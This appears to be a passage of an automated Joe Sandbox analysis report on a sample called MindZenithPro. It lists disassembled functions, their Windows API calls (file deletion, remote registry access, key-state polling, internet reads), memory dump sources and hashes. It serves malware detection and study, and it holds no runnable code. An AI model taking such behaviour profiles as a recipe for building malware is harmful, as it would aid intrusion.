                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-1355242751
                                    • Opcode ID: 9d66a68fe365780708e1b0b6e6aac13b298bb392a70bef5f745bac49f100503a
                                    • Instruction ID: 0f71292a703bc9e6de6c61f0c8618458ba68b6f00fdfdc4363cd220dd091fbfb
                                    • Opcode Fuzzy Hash: 9d66a68fe365780708e1b0b6e6aac13b298bb392a70bef5f745bac49f100503a
                                    • Instruction Fuzzy Hash: 0CD01231D02F226B46372726AC09F8E6A159E81B233564139F904E6119DF24EDC186DD
                                    Function 00433030 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004332EE
                                    • DeleteFileW.KERNEL32(?), ref: 00433370
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00433386
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00433397
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004333A9
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: File$Delete$Copy
                                    • String ID:
                                    • API String ID: 3226157194-0
                                    • Opcode ID: 45cc8d826c8897772f1743205ca39b671de653a115568cf964da079549eaf92d
                                    • Instruction ID: ca0e1a6180ad2ff719c1242362b5fa97b2fc3bebb259c49486f5434fae1ac270
                                    • Opcode Fuzzy Hash: 45cc8d826c8897772f1743205ca39b671de653a115568cf964da079549eaf92d
                                    • Instruction Fuzzy Hash: 84B15E72A00128ABDF11DFA5CC85EDFBB7DEF48315F0041AAF509E6181EB34AA458F65
                                    Function 0044AB0E Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0044ABAE
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0044ABBC
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0044ABEF
                                    • CloseHandle.KERNEL32(?), ref: 0044ADC4
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                    • String ID:
                                    • API String ID: 3488606520-0
                                    • Opcode ID: 93aa01745812c610a0f19e3bc2b543aae07836129e05960b93b29bed72b07cbd
                                    • Instruction ID: 0f2cd3df632b5c71538de99c6d25c8ac5c4dc4f0f4d8888e17628046335cffa4
                                    • Opcode Fuzzy Hash: 93aa01745812c610a0f19e3bc2b543aae07836129e05960b93b29bed72b07cbd
                                    • Instruction Fuzzy Hash: BEA1BEB16047009FE720DF28C882F2AB7E2AF44714F14885EF999CB792D774ED408B86
                                    Function 0044C150 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 0044D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0044BE35,?,?), ref: 0044D13C
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D178
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D1E6
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D21C
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044C22C
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0044C287
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0044C2EA
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0044C32D
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044C33A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 826366716-0
                                    • Opcode ID: 5e9025e5268c4766cc13f82103512674f930669df1c3435b9d049ccb51e87750
                                    • Instruction ID: d6a891f7be4e493800f0163b02b6662b35eff9edf860e8799873c552300558fe
                                    • Opcode Fuzzy Hash: 5e9025e5268c4766cc13f82103512674f930669df1c3435b9d049ccb51e87750
                                    • Instruction Fuzzy Hash: 1A61A031609241AFD754DF64C8C0E2ABBE5FF84308F18859DF4598B2A2CB75ED46CB92
                                    Function 0042EA3C Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042E421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0042D507,?), ref: 0042E43E
                                      • Part of subcall function 0042E421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0042D507,?), ref: 0042E457
                                      • Part of subcall function 0042E7DA: GetFileAttributesW.KERNEL32(?,0042D57A), ref: 0042E7DB
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0042EAB4
                                    • MoveFileW.KERNEL32(?,?), ref: 0042EAED
                                    • _wcslen.LIBCMT ref: 0042EC2C
                                    • _wcslen.LIBCMT ref: 0042EC44
                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0042EC91
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                    • String ID:
                                    • API String ID: 3183298772-0
                                    • Opcode ID: 5022bcad2fc450b21fde90fc4c5aee94ac613828a4d88b7a0c29b135b1cbe90c
                                    • Instruction ID: ffdcee14315d596a8661d9d2ec3f9a657e8a2705c7e826d4a758970cb48f6194
                                    • Opcode Fuzzy Hash: 5022bcad2fc450b21fde90fc4c5aee94ac613828a4d88b7a0c29b135b1cbe90c
                                    • Instruction Fuzzy Hash: 7A51A3B25083949BC725EB92D881ADB73ECAF84304F40492FF685C3191EF74A688C75A
                                    Function 004292A9 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 004292C6
                                    • VariantClear.OLEAUT32 ref: 00429337
                                    • VariantClear.OLEAUT32 ref: 00429396
                                    • VariantClear.OLEAUT32(?), ref: 00429409
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00429434
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: b6da6bd4e6986ffdafc310e8821a712b86e7483c98da76ad0a52ef640eda0b80
                                    • Instruction ID: b91c87810b2446f05dc9dc454e9ca535b5ad47f64d9b72fdab2453c70c620157
                                    • Opcode Fuzzy Hash: b6da6bd4e6986ffdafc310e8821a712b86e7483c98da76ad0a52ef640eda0b80
                                    • Instruction Fuzzy Hash: B4515BB5A00219EFCB14CF58D884AAAB7F5FF8D314F05816AE909DB310D734E912CB94
                                    Function 0043926A Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0043931D
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00439349
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004393A1
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004393C6
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004393CE
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String
                                    • String ID:
                                    • API String ID: 2832842796-0
                                    • Opcode ID: 088de7750b76b65ee4e77f354fc6ac7e4735752ab2d3bc4b158b78184e8c28de
                                    • Instruction ID: b8dd916bb7e7671cf1fd7880faf4041bb5a12036718c843b8a390043fbed4476
                                    • Opcode Fuzzy Hash: 088de7750b76b65ee4e77f354fc6ac7e4735752ab2d3bc4b158b78184e8c28de
                                    • Instruction Fuzzy Hash: 0F513835A006199FCB05DF65C881E6ABBF6FF48314F048099E849AB3A2CB75ED41CB94
                                    Function 0044966B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 004496C7
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00449757
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00449773
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004497B9
                                    • FreeLibrary.KERNEL32(00000000), ref: 004497D9
                                      • Part of subcall function 003DFAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,0043172C,?,753CE610), ref: 003DFAE3
                                      • Part of subcall function 003DFAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,004200EB,00000000,00000000,?,?,0043172C,?,753CE610,?,004200EB), ref: 003DFB0A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                    • String ID:
                                    • API String ID: 666041331-0
                                    • Opcode ID: 9a64731867910f056cd439737cde5fc122748d737149d548d614c09cea525b3b
                                    • Instruction ID: 94cf7f3d415f524c4c8a026a746e6f700dc4a859c73e0a309c0ee9d5a82e39a9
                                    • Opcode Fuzzy Hash: 9a64731867910f056cd439737cde5fc122748d737149d548d614c09cea525b3b
                                    • Instruction Fuzzy Hash: C1514935A10205DFDB11EF58C494D9ABBB0FF09314B0581AAE81A9B322C735ED86DF95
                                    Function 00457241 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 004572FE
                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00457315
                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 0045733E
                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0043B2E8,00000000,00000000), ref: 00457363
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00457392
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Long$MessageSendShow
                                    • String ID:
                                    • API String ID: 3688381893-0
                                    • Opcode ID: 969f8128aaa2a66d85f7f21cc446301c08ddebd4416fee3df61fc2fa20ed7c9b
                                    • Instruction ID: 6600d1e3d0e8a6f1528448452b6207eea9bf7150e44c856f7ee0ee587783127d
                                    • Opcode Fuzzy Hash: 969f8128aaa2a66d85f7f21cc446301c08ddebd4416fee3df61fc2fa20ed7c9b
                                    • Instruction Fuzzy Hash: 6C41E235A08204AFD724CF68DC88FAA7B65EB09321F140276FC19A73E2C374ED45DA48
                                    Function 003F2311 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 58b8d10184e8458415354755f33353ac77109e9b68237765822edbed4fc75b91
                                    • Instruction ID: f3b27ceb2408f1f3229832384af68109cca05d8c632a15cee9f5d7bca9a55020
                                    • Opcode Fuzzy Hash: 58b8d10184e8458415354755f33353ac77109e9b68237765822edbed4fc75b91
                                    • Instruction Fuzzy Hash: 8E41E276A00208DFDB25DF79C890A6EB3E6EF89714F164569EA15EF391D630ED01CB80
                                    Function 003C135A Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 003C136E
                                    • ScreenToClient.USER32(00000000,?), ref: 003C138B
                                    • GetAsyncKeyState.USER32(00000001), ref: 003C13C2
                                    • GetAsyncKeyState.USER32(00000002), ref: 003C13DC
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: b0b47ab8799496dc0bb0b6ae2840fe5c7dff1c456a06a4ae465915cda9a64610
                                    • Instruction ID: f9291f49e9595bb1f1216493e0849646a1fdd79ac728372b8ecb151988ca89d9
                                    • Opcode Fuzzy Hash: b0b47ab8799496dc0bb0b6ae2840fe5c7dff1c456a06a4ae465915cda9a64610
                                    • Instruction Fuzzy Hash: CE41BF75A0421AFBDF0AAF65C808BEEB774FF05324F20832AE825A62D1D7346D44DB55
                                    Function 0043D689 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0043D6A7
                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 0043D6DE
                                    • GetLastError.KERNEL32(?,00000000,?,?,?,0043C98D,00000000), ref: 0043D723
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0043C98D,00000000), ref: 0043D737
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0043C98D,00000000), ref: 0043D761
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                    • String ID:
                                    • API String ID: 3191363074-0
                                    • Opcode ID: 5f2bf780fec9d8881d7fd90e9eee8afa1990967f4c7710f1611917dc603124fa
                                    • Instruction ID: e913b055884c354f64232c91a48986bfdb950af7e3378df015c7f9852f9197e8
                                    • Opcode Fuzzy Hash: 5f2bf780fec9d8881d7fd90e9eee8afa1990967f4c7710f1611917dc603124fa
                                    • Instruction Fuzzy Hash: 55318B71D00304AFDB24DFA6E885AABB7F8EF08354F10442EE456D7250E734EE419B68
                                    Function 004410B7 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 004410D8
                                    • GetForegroundWindow.USER32 ref: 004410EF
                                    • GetDC.USER32(00000000), ref: 0044112B
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00441137
                                    • ReleaseDC.USER32(00000000,00000003), ref: 0044116F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: faaf77288d6afa306d9ccbe5ba2556b600bfaeee19fd26435a81b18882c3eec8
                                    • Instruction ID: 4934f004fd45532af0d7b607273533717f065eac7885fa2566170f04b469ac1e
                                    • Opcode Fuzzy Hash: faaf77288d6afa306d9ccbe5ba2556b600bfaeee19fd26435a81b18882c3eec8
                                    • Instruction Fuzzy Hash: 09215E35A00214AFD714EFA5C895E9AB7F9EF48301F04807DE44A97662DA74AD80CB54
                                    Function 003FD10E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 003FD117
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FD13A
                                      • Part of subcall function 003F3B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E0145,?,?,00430F03,0000FFFF), ref: 003F3BA2
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003FD160
                                    • _free.LIBCMT ref: 003FD173
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003FD182
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 5eb3b5880e45ec7d51ed818c44473971653098fdbf7d73ce5f31df0286da625d
                                    • Instruction ID: 0063e5f124355b358a04058ebee3f762829a1d662b9efade3aac6a9fb472240b
                                    • Opcode Fuzzy Hash: 5eb3b5880e45ec7d51ed818c44473971653098fdbf7d73ce5f31df0286da625d
                                    • Instruction Fuzzy Hash: A50184B2A0171D7F237356765C8CC7B796EDEC6BA1315022ABE04C7221DE608C0191B0
                                    Function 003D986F Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003D98C9
                                    • SelectObject.GDI32(?,00000000), ref: 003D98D8
                                    • BeginPath.GDI32(?), ref: 003D98EF
                                    • SelectObject.GDI32(?,00000000), ref: 003D9918
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 97d16e76b45a6b78049c663678761dc4f0c8ab45c5b36fc11cd3802f97f85e8b
                                    • Instruction ID: e34f9e826e18bd884e28316e43a02b0c1d7a8119067c9ca51255e09137ec746d
                                    • Opcode Fuzzy Hash: 97d16e76b45a6b78049c663678761dc4f0c8ab45c5b36fc11cd3802f97f85e8b
                                    • Instruction Fuzzy Hash: DB21B0B1A02705FBDB12AF14EE057697B79BB21721F14023BF414962B1D3B08985DF98
                                    Function 003F3148 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(74DE2E40,?,?,003F2B6D,003F3BB3,?,?,003E0145,?,?,00430F03,0000FFFF), ref: 003F314D
                                    • _free.LIBCMT ref: 003F3182
                                    • _free.LIBCMT ref: 003F31A9
                                    • SetLastError.KERNEL32(00000000), ref: 003F31B6
                                    • SetLastError.KERNEL32(00000000), ref: 003F31BF
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
